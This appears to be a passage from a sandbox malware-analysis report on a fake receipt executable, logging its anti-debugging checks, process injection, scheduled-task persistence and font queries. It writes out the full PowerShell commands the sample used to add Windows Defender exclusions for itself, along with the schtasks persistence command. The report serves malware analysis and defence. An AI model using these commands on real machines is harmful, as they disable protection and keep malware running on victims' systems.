            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 238844
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 238718
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 238569
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 238448
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 237764
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 237655
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 922337203685477
            Source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XetHVID.exe"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XetHVID.exe"Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeMemory written: C:\Users\user\Desktop\Receipt-#202431029B.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeMemory written: C:\Users\user\AppData\Roaming\XetHVID.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XetHVID.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Users\user\Desktop\Receipt-#202431029B.exe "C:\Users\user\Desktop\Receipt-#202431029B.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp13D7.tmp"
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess created: C:\Users\user\AppData\Roaming\XetHVID.exe "C:\Users\user\AppData\Roaming\XetHVID.exe"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Users\user\Desktop\Receipt-#202431029B.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
